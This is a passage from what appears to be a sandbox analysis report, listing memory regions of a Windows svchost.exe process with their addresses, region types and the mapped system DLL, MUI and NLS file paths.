0x1440000 end_va = 0x153ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001440000" filename = "" Region: id = 1563 start_va = 0x1540000 end_va = 0x15bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001540000" filename = "" Region: id = 1564 start_va = 0x15c0000 end_va = 0x15c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000015c0000" filename = "" Region: id = 1565 start_va = 0x15d0000 end_va = 0x15d9fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "crypt32.dll.mui" filename = "\\Windows\\System32\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\crypt32.dll.mui") Region: id = 1566 start_va = 0x15e0000 end_va = 0x15f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1256.nls" filename = "\\Windows\\System32\\C_1256.NLS" (normalized: "c:\\windows\\system32\\c_1256.nls") Region: id = 1567 start_va = 0x1600000 end_va = 0x16fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001600000" filename = "" Region: id = 1568 start_va = 0x1700000 end_va = 0x17fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001700000" filename = "" Region: id = 1569 start_va = 0x1800000 end_va = 0x18dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 1570 start_va = 0x18e0000 end_va = 0x18f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1251.nls" filename = "\\Windows\\System32\\C_1251.NLS" (normalized: "c:\\windows\\system32\\c_1251.nls") Region: id = 1571 start_va = 0x1900000 end_va = 0x19fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001900000" filename = "" Region: id = 1572 start_va = 0x1a00000 end_va = 0x1a7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a00000" filename = "" Region: id = 1573 start_va = 0x1a80000 end_va = 0x1b7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a80000" filename = "" Region: id = 1574 start_va = 0x1b80000 end_va = 0x1c7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b80000" filename = "" Region: id = 1575 start_va = 0x1c80000 end_va = 0x1cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c80000" filename = "" Region: id = 1576 start_va = 0x1d00000 end_va = 0x1d7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d00000" filename = "" Region: id = 1577 start_va = 0x1d80000 end_va = 0x1e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d80000" filename = "" Region: id = 1578 start_va = 0x1e80000 end_va = 0x1f7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 1579 start_va = 0x1f80000 end_va = 0x207ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f80000" filename = "" Region: id = 1580 start_va = 0x2080000 end_va = 0x217ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002080000" filename = "" Region: id = 1581 start_va = 0x2180000 end_va = 0x227ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002180000" filename = "" Region: id = 1582 start_va = 0x2280000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002280000" filename = "" Region: id = 1583 start_va = 0x2380000 end_va = 0x247ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002380000" filename = "" Region: id = 1584 start_va = 0x2480000 end_va = 0x24fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002480000" filename = "" Region: id = 1585 start_va = 0x2500000 end_va = 0x25fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002500000" filename = "" Region: id = 1586 start_va = 0x2600000 end_va = 0x26fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002600000" filename = "" Region: id = 1587 start_va = 0x2700000 end_va = 0x27fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002700000" filename = "" Region: id = 1588 start_va = 0x2800000 end_va = 0x28fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002800000" filename = "" Region: id = 1589 start_va = 0x2900000 end_va = 0x29fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 1590 start_va = 0x2a00000 end_va = 0x2afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a00000" filename = "" Region: id = 1591 start_va = 0x2b00000 end_va = 0x2bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b00000" filename = "" Region: id = 1592 start_va = 0x2c00000 end_va = 0x2c8dfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 1593 start_va = 0x2c90000 end_va = 0x2d0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c90000" filename = "" Region: id = 1594 start_va = 0x2d10000 end_va = 0x2e0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d10000" filename = "" Region: id = 1595 start_va = 0x2e10000 end_va = 0x2f0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e10000" filename = "" Region: id = 1596 start_va = 0x2f10000 end_va = 0x300ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f10000" filename = "" Region: id = 1597 start_va = 0x3010000 end_va = 0x310ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003010000" filename = "" Region: id = 1598 start_va = 0x3110000 end_va = 0x3116fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003110000" filename = "" Region: id = 1599 start_va = 0x3120000 end_va = 0x3130fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1254.nls" filename = "\\Windows\\System32\\C_1254.NLS" (normalized: "c:\\windows\\system32\\c_1254.nls") Region: id = 1600 start_va = 0x3140000 end_va = 0x3150fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1250.nls" filename = "\\Windows\\System32\\C_1250.NLS" (normalized: "c:\\windows\\system32\\c_1250.nls") Region: id = 1601 start_va = 0x3160000 end_va = 0x3170fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1253.nls" filename = "\\Windows\\System32\\C_1253.NLS" (normalized: "c:\\windows\\system32\\c_1253.nls") Region: id = 1602 start_va = 0x3190000 end_va = 0x328ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003190000" filename = "" Region: id = 1603 start_va = 0x3290000 end_va = 0x330ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003290000" filename = "" Region: id = 1604 start_va = 0x3310000 end_va = 0x338ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003310000" filename = "" Region: id = 1605 start_va = 0x3390000 end_va = 0x3396fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003390000" filename = "" Region: id = 1606 start_va = 0x33a0000 end_va = 0x349ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000033a0000" filename = "" Region: id = 1607 start_va = 0x34a0000 end_va = 0x34b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1257.nls" filename = "\\Windows\\System32\\C_1257.NLS" (normalized: "c:\\windows\\system32\\c_1257.nls") Region: id = 1608 start_va = 0x34c0000 end_va = 0x34d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1255.nls" filename = "\\Windows\\System32\\C_1255.NLS" (normalized: "c:\\windows\\system32\\c_1255.nls") Region: id = 1609 start_va = 0x34e0000 end_va = 0x3507fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_932.nls" filename = "\\Windows\\System32\\C_932.NLS" (normalized: "c:\\windows\\system32\\c_932.nls") Region: id = 1610 start_va = 0x3510000 end_va = 0x3540fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_949.nls" filename = "\\Windows\\System32\\C_949.NLS" (normalized: "c:\\windows\\system32\\c_949.nls") Region: id = 1611 start_va = 0x3550000 end_va = 0x3560fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_874.nls" filename = "\\Windows\\System32\\C_874.NLS" (normalized: "c:\\windows\\system32\\c_874.nls") Region: id = 1612 start_va = 0x3570000 end_va = 0x35effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003570000" filename = "" Region: id = 1613 start_va = 0x35f0000 end_va = 0x3600fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1258.nls" filename = "\\Windows\\System32\\C_1258.NLS" (normalized: "c:\\windows\\system32\\c_1258.nls") Region: id = 1614 start_va = 0x3610000 end_va = 0x3640fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_936.nls" filename = "\\Windows\\System32\\C_936.NLS" (normalized: "c:\\windows\\system32\\c_936.nls") Region: id = 1615 start_va = 0x3670000 end_va = 0x376ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003670000" filename = "" Region: id = 1616 start_va = 0x3770000 end_va = 0x386ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003770000" filename = "" Region: id = 1617 start_va = 0x3870000 end_va = 0x38effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 1618 start_va = 0x3900000 end_va = 0x39fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003900000" filename = "" Region: id = 1619 start_va = 0x3a00000 end_va = 0x3afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a00000" filename = "" Region: id = 1620 start_va = 0x3b00000 end_va = 0x3bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b00000" filename = "" Region: id = 1621 start_va = 0x3c00000 end_va = 0x3c7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c00000" filename = "" Region: id = 1622 start_va = 0x3c80000 end_va = 0x3cb0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_950.nls" filename = "\\Windows\\System32\\C_950.NLS" (normalized: "c:\\windows\\system32\\c_950.nls") Region: id = 1623 start_va = 0x3cc0000 end_va = 0x3cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "usocore.dll.mui" filename = "\\Windows\\System32\\en-US\\usocore.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\usocore.dll.mui") Region: id = 1624 start_va = 0x3cd0000 end_va = 0x3cd1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003cd0000" filename = "" Region: id = 1625 start_va = 0x3ce0000 end_va = 0x3cf7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ce0000" filename = "" Region: id = 1626 start_va = 0x3d00000 end_va = 0x3dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d00000" filename = "" Region: id = 1627 start_va = 0x3e00000 end_va = 0x3e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e00000" filename = "" Region: id = 1628 start_va = 0x3e80000 end_va = 0x3efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e80000" filename = "" Region: id = 1629 start_va = 0x3f00000 end_va = 0x3ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f00000" filename = "" Region: id = 1630 start_va = 0x4000000 end_va = 0x40fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004000000" filename = "" Region: id = 1631 start_va = 0x4100000 end_va = 0x41fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004100000" filename = "" Region: id = 1632 start_va = 0x4200000 end_va = 0x42fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 1633 start_va = 0x4300000 end_va = 0x43fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004300000" filename = "" Region: id = 1634 start_va = 0x4400000 end_va = 0x44fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 1635 start_va = 0x4500000 end_va = 0x45fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004500000" filename = "" Region: id = 1636 start_va = 0x4600000 end_va = 0x46fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004600000" filename = "" Region: id = 1637 start_va = 0x4700000 end_va = 0x47fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004700000" filename = "" Region: id = 1638 start_va = 0x4800000 end_va = 0x48fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 1639 start_va = 0x4900000 end_va = 0x49fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004900000" filename = "" Region: id = 1640 start_va = 0x4c00000 end_va = 0x4cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c00000" filename = "" Region: id = 1641 start_va = 0x4e00000 end_va = 0x4efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004e00000" filename = "" Region: id = 1642 start_va = 0x5000000 end_va = 0x50fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005000000" filename = "" Region: id = 1643 start_va = 0x5300000 end_va = 0x53fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005300000" filename = "" Region: id = 1644 start_va = 0x5400000 end_va = 0x54fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005400000" filename = "" Region: id = 1645 start_va = 0x5600000 end_va = 0x56fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005600000" filename = "" Region: id = 1646 start_va = 0x5700000 end_va = 0x57fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005700000" filename = "" Region: id = 1647 start_va = 0x5800000 end_va = 0x58fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005800000" filename = "" Region: id = 1648 start_va = 0x5900000 end_va = 0x59fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005900000" filename = "" Region: id = 1649 start_va = 0x5a00000 end_va = 0x5afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005a00000" filename = "" Region: id = 1650 start_va = 0x5b00000 end_va = 0x5bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005b00000" filename = "" Region: id = 1651 start_va = 0x5c00000 end_va = 0x5cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005c00000" filename = "" Region: id = 1652 start_va = 0x5d00000 end_va = 0x5dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005d00000" filename = "" Region: id = 1653 start_va = 0x5e00000 end_va = 0x5efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e00000" filename = "" Region: id = 1654 start_va = 0x5f00000 end_va = 0x5ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005f00000" filename = "" Region: id = 1655 start_va = 0x6000000 end_va = 0x60fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006000000" filename = "" Region: id = 1656 start_va = 0x6100000 end_va = 0x61fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006100000" filename = "" Region: id = 1657 start_va = 0x6200000 end_va = 0x62fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006200000" filename = "" Region: id = 1658 start_va = 0x6300000 end_va = 0x63fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006300000" filename = "" Region: id = 1659 start_va = 0x6400000 end_va = 0x64fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006400000" filename = "" Region: id = 1660 start_va = 0x6500000 end_va = 0x65fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006500000" filename = "" Region: id = 1661 start_va = 0x6600000 end_va = 0x66fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006600000" filename = "" Region: id = 1662 start_va = 0x6700000 end_va = 0x67fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006700000" filename = "" Region: id = 1663 start_va = 0x6900000 end_va = 0x69fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006900000" filename = "" Region: id = 1664 start_va = 0x6a00000 end_va = 0x6afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006a00000" filename = "" Region: id = 1665 start_va = 0x6b00000 end_va = 0x6bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006b00000" filename = "" Region: id = 1666 start_va = 0x6c00000 end_va = 0x6cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006c00000" filename = "" Region: id = 1667 start_va = 0x6d00000 end_va = 0x6dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006d00000" filename = "" Region: id = 1668 start_va = 0x6e00000 end_va = 0x6efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006e00000" filename = "" Region: id = 1669 start_va = 0x7100000 end_va = 0x71fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007100000" filename = "" Region: id = 1670 start_va = 0x7600000 end_va = 0x76fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007600000" filename = "" Region: id = 1671 start_va = 0x7700000 end_va = 0x77fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007700000" filename = "" Region: id = 1672 start_va = 0x7800000 end_va = 0x78fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007800000" filename = "" Region: id = 1673 start_va = 0x7900000 end_va = 0x79fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007900000" filename = "" Region: id = 1674 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1675 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 1676 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 1677 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 1678 start_va = 0x7ff681250000 end_va = 0x7ff68125cfff monitored = 0 entry_point = 0x7ff681253980 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 1679 start_va = 0x7ff9fbea0000 end_va = 0x7ff9fbea7fff monitored = 0 entry_point = 0x7ff9fbea13b0 region_type = mapped_file name = "dmiso8601utils.dll" filename = "\\Windows\\System32\\dmiso8601utils.dll" (normalized: "c:\\windows\\system32\\dmiso8601utils.dll") Region: id = 1680 start_va = 0x7ff9fbfb0000 end_va = 0x7ff9fbfc6fff monitored = 0 entry_point = 0x7ff9fbfb7520 region_type = mapped_file name = "usoapi.dll" filename = "\\Windows\\System32\\usoapi.dll" (normalized: "c:\\windows\\system32\\usoapi.dll") Region: id = 1681 start_va = 0x7ff9fbfd0000 end_va = 0x7ff9fc0a4fff monitored = 0 entry_point = 0x7ff9fbfecf80 region_type = mapped_file name = "wuapi.dll" filename = "\\Windows\\System32\\wuapi.dll" (normalized: "c:\\windows\\system32\\wuapi.dll") Region: id = 1682 start_va = 0x7ff9fc0b0000 end_va = 0x7ff9fc0f3fff monitored = 0 entry_point = 0x7ff9fc0d83e0 region_type = mapped_file name = "updatehandlers.dll" filename = "\\Windows\\System32\\updatehandlers.dll" (normalized: "c:\\windows\\system32\\updatehandlers.dll") Region: id = 1683 start_va = 0x7ff9fc100000 end_va = 0x7ff9fc121fff monitored = 0 entry_point = 0x7ff9fc112540 region_type = mapped_file name = "updatepolicy.dll" filename = "\\Windows\\System32\\updatepolicy.dll" (normalized: "c:\\windows\\system32\\updatepolicy.dll") Region: id = 1684 start_va = 0x7ff9fc130000 end_va = 0x7ff9fc147fff monitored = 0 entry_point = 0x7ff9fc13b850 region_type = mapped_file name = "dmcmnutils.dll" filename = "\\Windows\\System32\\dmcmnutils.dll" (normalized: "c:\\windows\\system32\\dmcmnutils.dll") Region: id = 1685 start_va = 0x7ff9fc150000 end_va = 0x7ff9fc1acfff monitored = 0 entry_point = 0x7ff9fc17e510 region_type = mapped_file name = "usocore.dll" filename = "\\Windows\\System32\\usocore.dll" (normalized: "c:\\windows\\system32\\usocore.dll") Region: id = 1686 start_va = 0x7ff9fc480000 end_va = 0x7ff9fc72ffff monitored = 0 entry_point = 0x7ff9fc481cf0 region_type = mapped_file name = "netshell.dll" filename = "\\Windows\\System32\\netshell.dll" (normalized: "c:\\windows\\system32\\netshell.dll") Region: id = 1687 start_va = 0x7ff9fe120000 end_va = 0x7ff9fe19ffff monitored = 0 entry_point = 0x7ff9fe14d280 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 1688 start_va = 0x7ff9fe260000 end_va = 0x7ff9fe29efff monitored = 0 entry_point = 0x7ff9fe2882d0 region_type = mapped_file name = "tcpipcfg.dll" filename = "\\Windows\\System32\\tcpipcfg.dll" (normalized: "c:\\windows\\system32\\tcpipcfg.dll") Region: id = 1689 start_va = 0x7ff9fe2a0000 end_va = 0x7ff9fe2b1fff monitored = 0 entry_point = 0x7ff9fe2a1a80 region_type = mapped_file name = "bitsproxy.dll" filename = "\\Windows\\System32\\BitsProxy.dll" (normalized: "c:\\windows\\system32\\bitsproxy.dll") Region: id = 1690 start_va = 0x7ff9fe490000 end_va = 0x7ff9fe4a7fff monitored = 0 entry_point = 0x7ff9fe491b10 region_type = mapped_file name = "locationframeworkinternalps.dll" filename = "\\Windows\\System32\\LocationFrameworkInternalPS.dll" (normalized: "c:\\windows\\system32\\locationframeworkinternalps.dll") Region: id = 1691 start_va = 0x7ff9fe510000 end_va = 0x7ff9fe545fff monitored = 0 entry_point = 0x7ff9fe5127f0 region_type = mapped_file name = "windows.networking.hostname.dll" filename = "\\Windows\\System32\\Windows.Networking.HostName.dll" (normalized: "c:\\windows\\system32\\windows.networking.hostname.dll") Region: id = 1692 start_va = 0x7ff9ffbf0000 end_va = 0x7ff9ffcfefff monitored = 0 entry_point = 0x7ff9ffc2c010 region_type = mapped_file name = "dosvc.dll" filename = "\\Windows\\System32\\dosvc.dll" (normalized: "c:\\windows\\system32\\dosvc.dll") Region: id = 1693 start_va = 0x7ffa001f0000 end_va = 0x7ffa0030cfff monitored = 0 entry_point = 0x7ffa0021fe60 region_type = mapped_file name = "qmgr.dll" filename = "\\Windows\\System32\\qmgr.dll" (normalized: "c:\\windows\\system32\\qmgr.dll") Region: id = 1694 start_va = 0x7ffa01690000 end_va = 0x7ffa016a3fff monitored = 0 entry_point = 0x7ffa01693710 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\System32\\mskeyprotect.dll" (normalized: "c:\\windows\\system32\\mskeyprotect.dll") Region: id = 1695 start_va = 0x7ffa01740000 end_va = 0x7ffa0175dfff monitored = 0 entry_point = 0x7ffa0174ef80 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\System32\\ncryptsslp.dll" (normalized: "c:\\windows\\system32\\ncryptsslp.dll") Region: id = 1696 start_va = 0x7ffa069a0000 end_va = 0x7ffa069b5fff monitored = 0 entry_point = 0x7ffa069a1d50 region_type = mapped_file name = "wwapi.dll" filename = "\\Windows\\System32\\wwapi.dll" (normalized: "c:\\windows\\system32\\wwapi.dll") Region: id = 1697 start_va = 0x7ffa07a20000 end_va = 0x7ffa07a30fff monitored = 0 entry_point = 0x7ffa07a27480 region_type = mapped_file name = "tetheringclient.dll" filename = "\\Windows\\System32\\tetheringclient.dll" (normalized: "c:\\windows\\system32\\tetheringclient.dll") Region: id = 1698 start_va = 0x7ffa07a40000 end_va = 0x7ffa07ac3fff monitored = 0 entry_point = 0x7ffa07a58d50 region_type = mapped_file name = "wbemess.dll" filename = "\\Windows\\System32\\wbem\\wbemess.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemess.dll") Region: id = 1699 start_va = 0x7ffa07ad0000 end_va = 0x7ffa07ae5fff monitored = 0 entry_point = 0x7ffa07ad55e0 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 1700 start_va = 0x7ffa07af0000 end_va = 0x7ffa07bc5fff monitored = 0 entry_point = 0x7ffa07b1a800 region_type = mapped_file name = "wmiprvsd.dll" filename = "\\Windows\\System32\\wbem\\WmiPrvSD.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprvsd.dll") Region: id = 1701 start_va = 0x7ffa07c20000 end_va = 0x7ffa07c83fff monitored = 0 entry_point = 0x7ffa07c3bed0 region_type = mapped_file name = "repdrvfs.dll" filename = "\\Windows\\System32\\wbem\\repdrvfs.dll" (normalized: "c:\\windows\\system32\\wbem\\repdrvfs.dll") Region: id = 1702 start_va = 0x7ffa07c90000 end_va = 0x7ffa07cb4fff monitored = 0 entry_point = 0x7ffa07c99900 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 1703 start_va = 0x7ffa07cc0000 end_va = 0x7ffa07cd3fff monitored = 0 entry_point = 0x7ffa07cc1800 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 1704 start_va = 0x7ffa07ce0000 end_va = 0x7ffa07dd5fff monitored = 0 entry_point = 0x7ffa07d19590 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 1705 start_va = 0x7ffa07de0000 end_va = 0x7ffa07e53fff monitored = 0 entry_point = 0x7ffa07df5eb0 region_type = mapped_file name = "esscli.dll" filename = "\\Windows\\System32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll") Region: id = 1706 start_va = 0x7ffa07e60000 end_va = 0x7ffa07f96fff monitored = 0 entry_point = 0x7ffa07ea0480 region_type = mapped_file name = "wbemcore.dll" filename = "\\Windows\\System32\\wbem\\wbemcore.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemcore.dll") Region: id = 1707 start_va = 0x7ffa08390000 end_va = 0x7ffa083a0fff monitored = 0 entry_point = 0x7ffa08392fc0 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 1708 start_va = 0x7ffa083b0000 end_va = 0x7ffa083cdfff monitored = 0 entry_point = 0x7ffa083b3a40 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 1709 start_va = 0x7ffa083d0000 end_va = 0x7ffa08451fff monitored = 0 entry_point = 0x7ffa083d2a10 region_type = mapped_file name = "hnetcfg.dll" filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll") Region: id = 1710 start_va = 0x7ffa08460000 end_va = 0x7ffa08475fff monitored = 0 entry_point = 0x7ffa08461af0 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 1711 start_va = 0x7ffa08480000 end_va = 0x7ffa08499fff monitored = 0 entry_point = 0x7ffa08482330 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 1712 start_va = 0x7ffa08940000 end_va = 0x7ffa0894efff monitored = 0 entry_point = 0x7ffa08944960 region_type = mapped_file name = "nci.dll" filename = "\\Windows\\System32\\nci.dll" (normalized: "c:\\windows\\system32\\nci.dll") Region: id = 1713 start_va = 0x7ffa08a00000 end_va = 0x7ffa08a0bfff monitored = 0 entry_point = 0x7ffa08a035c0 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 1714 start_va = 0x7ffa08a10000 end_va = 0x7ffa08a4ffff monitored = 0 entry_point = 0x7ffa08a1cbe0 region_type = mapped_file name = "adsldpc.dll" filename = "\\Windows\\System32\\adsldpc.dll" (normalized: "c:\\windows\\system32\\adsldpc.dll") Region: id = 1715 start_va = 0x7ffa08a50000 end_va = 0x7ffa08a96fff monitored = 0 entry_point = 0x7ffa08a51d10 region_type = mapped_file name = "activeds.dll" filename = "\\Windows\\System32\\activeds.dll" (normalized: "c:\\windows\\system32\\activeds.dll") Region: id = 1716 start_va = 0x7ffa08ae0000 end_va = 0x7ffa08b21fff monitored = 0 entry_point = 0x7ffa08ae3670 region_type = mapped_file name = "wdscore.dll" filename 